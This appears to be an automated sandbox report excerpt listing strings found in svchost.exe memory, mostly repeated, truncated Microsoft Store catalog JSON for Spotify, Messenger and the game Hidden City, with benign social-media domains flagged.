                    Source: svchost.exe, 00000021.00000003.571037880.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-30T14:41:57.9016760Z||.||a2c1be1c-1f7b-4188-b36e-f57b9066932b||1152921505693336001||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 00000021.00000003.571037880.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",7 equals www.facebook.com (Facebook)
                    Source: svchost.exe, 00000021.00000003.571037880.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",7 equals www.twitter.com (Twitter)
                    Source: svchost.exe, 00000021.00000003.571125812.000001AB9EF72000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.facebook.com (Facebook)
                    Source: svchost.exe, 00000021.00000003.571125812.000001AB9EF72000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.twitter.com (Twitter)
                    Source: svchost.exe, 00000021.00000003.564325045.000001AB9EF73000.00000004.00000001.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-15T21:09:58.8377117Z||.||1ad32855-590c-405c-8d49-1a557bf58211||1152921505693277189||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-03-15T21:09:05.1816176Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
